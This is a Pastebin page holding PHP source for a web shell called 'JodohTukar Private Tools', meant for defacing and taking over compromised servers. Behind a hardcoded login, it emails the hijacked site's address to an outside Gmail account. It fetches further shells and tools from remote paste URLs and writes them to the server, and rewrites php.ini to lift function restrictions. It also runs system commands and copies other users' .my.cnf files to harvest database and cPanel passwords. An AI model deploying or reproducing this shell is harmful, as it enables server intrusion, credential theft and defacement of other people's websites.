API tools faq
paste
Advertisement
VanGans

jodoh tukar private tools (Web Shell)

VanGans
Sep 14th, 2019
610
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.08 KB | None | 0 0
raw download clone embed print report
  1.   <?php
  2. error_reporting(0);
  3. ob_start();
  4. session_start();
  5. ob_end_clean();
  6. $host = $_SERVER['HTTP_HOST'];
  7. $user=$_GET["username"];
  8. $pass=$_GET["password"];
  9. if($user=="defacerid" AND $pass=="defacerid")
  10. {
  11. $_SESSION["username"]=$user;
  12. }
  13. ?>
  14. <title>./JodohTukar Private Tools</title>
  15. <link href="http://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
  16. <style>
  17. body {
  18.     background:#2F302F;
  19.     color:#fff;
  20.     font-family: 'Share Tech Mono';
  21. }
  22. input[type=text] , input[type=password] {
  23.     background:none;
  24.     border-top:none;
  25.     border-left:none;
  26.     border-right:none;
  27.     color: #02BC8C ;
  28.     border-bottom:2px solid #02BC8C;
  29.     font-family: 'Share Tech Mono';
  30.     padding:2px 8px;
  31.     -moz-border-radius: 7px;
  32.     border-radius: 7px;width:30%;
  33. }
  34. input[type=submit] {
  35.     background:#02BC8C;
  36.     color:white;
  37.     border:1px solid #02BC8C;
  38.     font-family: 'Share Tech Mono';
  39.     padding:2px 8px;
  40.     -moz-border-radius: 10px;
  41.     border-radius: 10px;
  42.     width:10%;
  43. }
  44. .fak {
  45.     background: #02BC8C ;
  46.     color:#fff;
  47.     border:1px solid #02BC8C;
  48.     font-family: 'Share Tech Mono';
  49.     padding:2px 8px;
  50.     -moz-border-radius: 7px;
  51.     border-radius: 7px;
  52.     width:15%;
  53. }
  54. a {
  55.     text-decoration:none;
  56.     color:#02BC8C
  57. }
  58. </style>
  59. <br><br>
  60. <b>
  61. <?php
  62. error_reporting(0);
  63. ob_start();
  64. session_start();
  65. ob_end_clean();
  66. $subject = "Setor Guys -> ".$host;
  67. $message = "Link : ".$host."/".$_SERVER['PHP_SELF']."?user=$user&pass=$pass"; if(isset($_SESSION["username"])){
  68. mail("oppicialxz@gmail.com",$subject,$message,"From: $host" );
  69. // logout
  70. if(isset($_GET['logout'])){
  71. ob_start();
  72. session_start();
  73. ob_end_clean();
  74. session_destroy();
  75. }
  76. /* UstadCage_48 */
  77. $p = $_SERVER["HTTP_HOST"];
  78. $content = file_get_contents('https://pastebin.com/raw/2zTfNXNH');
  79. $fp = fopen($_SERVER['DOCUMENT_ROOT'] . "/history.html","w");
  80. if(fwrite($fp,$content)){
  81. $suck = "<font color=#02BC8C>OK</font>";
  82. $url = "http://$p/history.html";
  83. }else{
  84. $suck = "<font color=#F64747>ERROR</font>";
  85. $url = "/";
  86. }
  87. fclose($fp);
  88. // bypass
  89. $by = "disable_functions = none";
  90. $byy = fopen('php.ini', 'w');
  91. fwrite($byy,$by);
  92. fclose($byy);
  93. // fm
  94. $get = file_get_contents('https://pastebin.com/raw/vKfyPDA3');
  95. $bwt = fopen('fm.php', 'w');
  96. if(fwrite($bwt,$get)){
  97. $fm = "<a class=fak href=\"fm.php\">File Man</a>";
  98. }else{
  99. $fm = "<a class=fak>File Man</a>";
  100. }
  101. fclose($fp);
  102. // rshell
  103. $rs = file_get_contents('https://pastebin.com/raw/enqYngSs');
  104. $rs1 = fopen('rs.php', 'w');
  105. if(fwrite($rs1,$rs)){
  106. $rs2 = "<a class='fak' href='rs.php'>SQLID shell</a>";
  107. } else {
  108. $rs2 = "<a class=fak>SQLID shell</a>";
  109. }
  110. fclose($rs1);
  111. // idx
  112. $idx = file_get_contents('http://pastebin.com/raw/nC6pWh5a');
  113. $idx1 = fopen('idx.php', 'w');
  114. if(fwrite($idx1,$idx)){
  115. $idx2 = "<a class='fak' href='idx.php'>IndoXploit</a>";
  116. } else {
  117. $idx2 = "<a class=fak>IndoXploit</a>";
  118. }
  119. fclose($idx1);
  120. // wso
  121. $wso = file_get_contents('https://pastebin.com/raw/3UeQdFrb');
  122. $wso1 = fopen('root.php', 'w');
  123. if(fwrite($wso1,$wso)){
  124. $wso2 = "<a class='fak' href='root.php'>rootkit Shell</a>";
  125. } else {
  126. $wso2 = "<a class=fak>rootkit Shell</a>";
  127. }
  128. fclose($wso1);
  129. // Database
  130. $db = file_get_contents('https://gist.githubusercontent.com/Lamer1337Crew/4e950e7d1342b51ef24d0344c95d6581/raw/0bf871f6312b195d94398c08d2d692916c17b011/adminer.php');
  131. $db1 = fopen('db.php', 'w');
  132. if(fwrite($db1,$db)){
  133. $db2 = "<a class='fak' href='db.php'>Adminer</a>";
  134. } else {
  135. $db2 = "<a class=fak>Adminer</a>";
  136. }
  137. fclose($db1);
  138. // Sym
  139. $sym = file_get_contents('http://pastebin.com/raw/kY4XmPVv');
  140. $sym1 = fopen('sym.php', 'w');
  141. if(fwrite($sym1,$sym)){
  142. $sym2 = "<a class='fak' href='sym.php'>Symlink</a>";
  143. } else {
  144. $sym2 = "<a class=fak>Symlink</a>";
  145. }
  146. fclose($sym1);
  147. // Sym
  148. $sym111 = file_get_contents('https://pastebin.com/raw/57F3X517');
  149. $sym211 = fopen('403.php', 'w');
  150. if(fwrite($sym211,$sym111)){
  151. $sym311 = "<a class='fak' href='403.php'>Bypas 403</a>";
  152. } else {
  153. $sym311 = "<a class=fak>Bypas 403</a>";
  154. }
  155. fclose($sym211);
  156. // exe
  157. function exe($cmd) {
  158. if(function_exists('system')){     
  159. @ob_start();       
  160. @system($cmd);     
  161. $buff = @ob_get_contents();
  162. @ob_end_clean();       
  163. return $buff;  
  164. } elseif(function_exists('exec')){     
  165. @exec($cmd,$results);      
  166. $buff = "";        
  167. foreach($results as $result) {         
  168. $buff .= $result;      
  169. }
  170. return $buff;  
  171. } elseif(function_exists('passthru')){     
  172. @ob_start();       
  173. @passthru($cmd);       
  174. $buff = @ob_get_contents();
  175. @ob_end_clean();       
  176. return $buff;  
  177. } elseif(function_exists('shell_exec')){       
  178. $buff = @shell_exec($cmd);     
  179. return $buff;  
  180. }
  181. }
  182. // info
  183. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  184. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>OFF</font>";
  185. $ds = @ini_get("disable_functions");
  186. $mysql = (function_exists('mysql_connect')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
  187. $curl = (function_exists('curl_version')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
  188. $wget = (exe('wget --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
  189. $show_ds = (!empty($ds)) ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>NONE</font>";
  190. $user = @get_current_user();
  191. $uid = @getmyuid();
  192. $gid = @getmygid();
  193. // lets
  194. echo "<center><font new size='7'>./JodohTukar Private Shell</font><br>".php_uname()."<br>Safe_Mod : $sm | IP : $ip | User : $user($uid/$gid) | Dis : $show_ds | Mysql : $mysql | cURL : $curl <br>root@ndutt : ".getcwd()." [ <a href='$url'>$suck</a> ]";
  195. // menu
  196. echo "<br><br>$fm $rs2 $idx2 $wso2 $sym2 $db2 $sym311<br><br>";
  197. echo "&copy; 2018 - 2019 ./JodohTukar ~";
  198. // domain
  199. $file = @implode(@file("/etc/named.conf"));
  200. preg_match_all("#named/(.*?).db#",$file ,$r);
  201. $domains = array_unique($r[1]);
  202. {
  203. $do = "".count($domains)."";
  204. echo "<br>Ada [ ".$do." ] Domain";
  205. }
  206. // cp
  207. @ini_set('display_errors',0);
  208. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  209. $ar0=explode($marqueurDebutLien, $text);
  210. $ar1=explode($marqueurFinLien, $ar0[$i]);
  211. return trim($ar1[0]);
  212. }
  213. $d0mains = @file('/etc/named.conf');
  214. $domains = scandir("/var/named");
  215. if($domains or $d0mains){
  216. $domains = scandir("/var/named");
  217. if($domains) {
  218. $count=1;
  219. $dc = 0;
  220. $list = scandir("/var/named");
  221. foreach($list as $domain){
  222. if(strpos($domain,".db")){
  223. $domain = str_replace('.db','',$domain);
  224. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  225. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  226. $path = getcwd();
  227. if (is_readable($dirz)) {
  228. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  229. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  230. $password=entre2v2($p,'password="','"');
  231. $dc++;
  232. }}}
  233. $total = $dc;
  234. echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
  235. }else{
  236. $d0mains = @file('/etc/named.conf');
  237. if($d0mains){
  238. $count=1;
  239. $dc = 0;
  240. $mck = array();
  241. foreach($d0mains as $d0main){
  242. if(@eregi('zone',$d0main)){
  243. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  244. flush();
  245. if(strlen(trim($domain[1][0])) >2){
  246. $mck[] = $domain[1][0];
  247. }}}
  248. $mck = array_unique($mck);
  249. $usr = array();
  250. $dmn = array();
  251. foreach($mck as $o) {
  252. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  253. $usr[] = $infos['name'];
  254. $dmn[] = $o;
  255. }
  256. array_multisort($usr,$dmn);
  257. $dt = file('/etc/passwd');
  258. $passwd = array();
  259. foreach($dt as $d) {
  260. $r = explode(':',$d);
  261. if(strpos($r[5],'home')){
  262. $passwd[$r[0]] = $r[5];
  263. }}
  264. $l=0;
  265. $j=1;
  266. foreach($usr as $r){
  267. $dirz = '/home/'.$r.'/.my.cnf';
  268. $path = getcwd();
  269. if (is_readable($dirz)) {
  270. copy($dirz, ''.$path.'/'.$r.'.txt');
  271. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  272. $password=entre2v2($p,'password="','"');
  273. $dc++;
  274. flush();
  275. $l=$l?0:1;
  276. $j++;
  277. }}}
  278. $total = $dc;
  279. echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
  280. }
  281. }else{
  282. echo "<br><font color='#fff'>Info Cpanel : </font> <font color='#02BC8C'> Not Accessible!</font><br>";
  283. }
  284. // jump
  285. set_time_limit(0);
  286. @$passwd = fopen('/etc/passwd','r');
  287. if(!$passwd){ die('<b> Jumping Info : <font color="#02BC8C">Wew Ternyata Tidak Ada Web Yg Bisa Di Ikeh Ikeh >_< </font></b>'); }
  288. $pub = array();
  289. $users = array();
  290. $conf = array();
  291. $i = 0;
  292. while(!feof($passwd)){
  293. $str = fgets($passwd);
  294. if($i > 35){
  295. $pos = strpos($str,':');
  296. $username = substr($str,0,$pos);
  297. $dirz = '/home/'.$username.'/public_html/';
  298. if(($username != '')){
  299. if(is_readable($dirz)){
  300. array_push($users,$username);
  301. array_push($pub,$dirz);
  302. }}}
  303. $i++;
  304. }
  305. echo " Jumping Info : Di Temukan <font color=#02BC8C> ".sizeof($users)." </font> Web Dalam Server $ip >_<"."<br />";
  306. }else{
  307. echo '<center>
  308. ./JodohTukar Private Tools<br><pre>
  309. ─╔╗───╔═╗─────────────╔╗─╔╗
  310. ╔╝║╔═╗║═╣╔═╗─╔═╗╔═╗╔╦╗╠╣╔╝║
  311. ║╬║║╩╣║╔╝║╬╚╗║═╣║╩╣║╔╝║║║╬║
  312. ╚═╝╚═╝╚╝─╚══╝╚═╝╚═╝╚╝─╚╝╚═╝
  313. </font>
  314. </pre>"./JodohTukar"<br>
  315. '.$_SERVER['HTTP_HOST'].'
  316. <form method="GET" action="">
  317. <p><input type="text" name="username" value="" placeholder="User"></p>
  318. <p><input type="password" name="password" value="" placeholder="Pass"></p>
  319. <p><input type="submit" name="commit" value="Login"></p>
  320. </form>
  321. </center>
  322. ';
  323. }
  324. ?>
  325. </b>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!